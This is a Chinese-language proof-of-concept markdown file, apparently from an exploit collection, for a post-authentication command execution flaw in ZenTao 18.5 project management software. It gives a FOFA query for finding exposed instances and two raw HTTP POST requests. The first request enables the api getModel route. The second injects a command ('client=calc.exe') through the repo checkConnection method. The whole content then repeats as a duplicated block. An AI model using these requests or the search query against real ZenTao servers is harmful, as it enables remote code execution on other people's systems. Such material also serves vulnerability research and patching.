POC00/禅道18.5存在后台命令执行漏洞.md

## 禅道18.5存在后台命令执行漏洞

## fofa

```
app="易软天创-禅道系统"
```

## poc

```
POST /zentaopms/www/index.php?m=custom&f=ajaxSaveCustomFields&module=common§ion=features&key=apiGetModel HTTP/1.1
Host: 192.168.234.128
Content-Length: 11
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.234.128
Referer: http://192.168.234.128/zentaopms/www/index.php?m=projectstory&f=story&projectID=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: zentaosid=t33hnj6nnkdkjcid7rp3bdl63e;
Connection: close

fields=true
```

```
POST /zentaopms/www/index.php?m=api&f=getModel&moduleName=repo&methodName=checkConnection HTTP/1.1
Host: 192.168.234.128
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Referer: http://192.168.234.128/zentaopms/www/index.php
Cookie: zentaosid=t33hnj6nnkdkjcid7rp3bdl63e;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

client=calc.exe&SCM=Subversion
```

![image-20240615214631156](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406152146214.png)

![image-20240615214643016](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406152146078.png)

## 漏洞来源

- https://www.t00ls.com/thread-71854-1-1.html
6.18更新漏洞 2024-06-18 15:35:32 +08:00			`## 禅道18.5存在后台命令执行漏洞`

			`## fofa`

			```
			`app="易软天创-禅道系统"`
			```

			`## poc`

			```
			`POST /zentaopms/www/index.php?m=custom&f=ajaxSaveCustomFields&module=common§ion=features&key=apiGetModel HTTP/1.1`
			`Host: 192.168.234.128`
			`Content-Length: 11`
			`Accept: application/json, text/javascript, /; q=0.01`
			`X-Requested-With: XMLHttpRequest`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36`
			`Content-Type: application/x-www-form-urlencoded; charset=UTF-8`
			`Origin: http://192.168.234.128`
			`Referer: http://192.168.234.128/zentaopms/www/index.php?m=projectstory&f=story&projectID=1`
			`Accept-Encoding: gzip, deflate`
			`Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6`
			`Cookie: zentaosid=t33hnj6nnkdkjcid7rp3bdl63e;`
			`Connection: close`

			`fields=true`
			```

			```
			`POST /zentaopms/www/index.php?m=api&f=getModel&moduleName=repo&methodName=checkConnection HTTP/1.1`
			`Host: 192.168.234.128`
			`accept: /`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36`
			`Accept-Encoding: gzip, deflate`
			`Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6`
			`Referer: http://192.168.234.128/zentaopms/www/index.php`
			`Cookie: zentaosid=t33hnj6nnkdkjcid7rp3bdl63e;`
			`Connection: close`
			`Content-Type: application/x-www-form-urlencoded`
			`Content-Length: 30`

			`client=calc.exe&SCM=Subversion`
			```

			`![image-20240615214631156](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406152146214.png)`

			`![image-20240615214643016](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406152146078.png)`

			`## 漏洞来源`

			`- https://www.t00ls.com/thread-71854-1-1.html`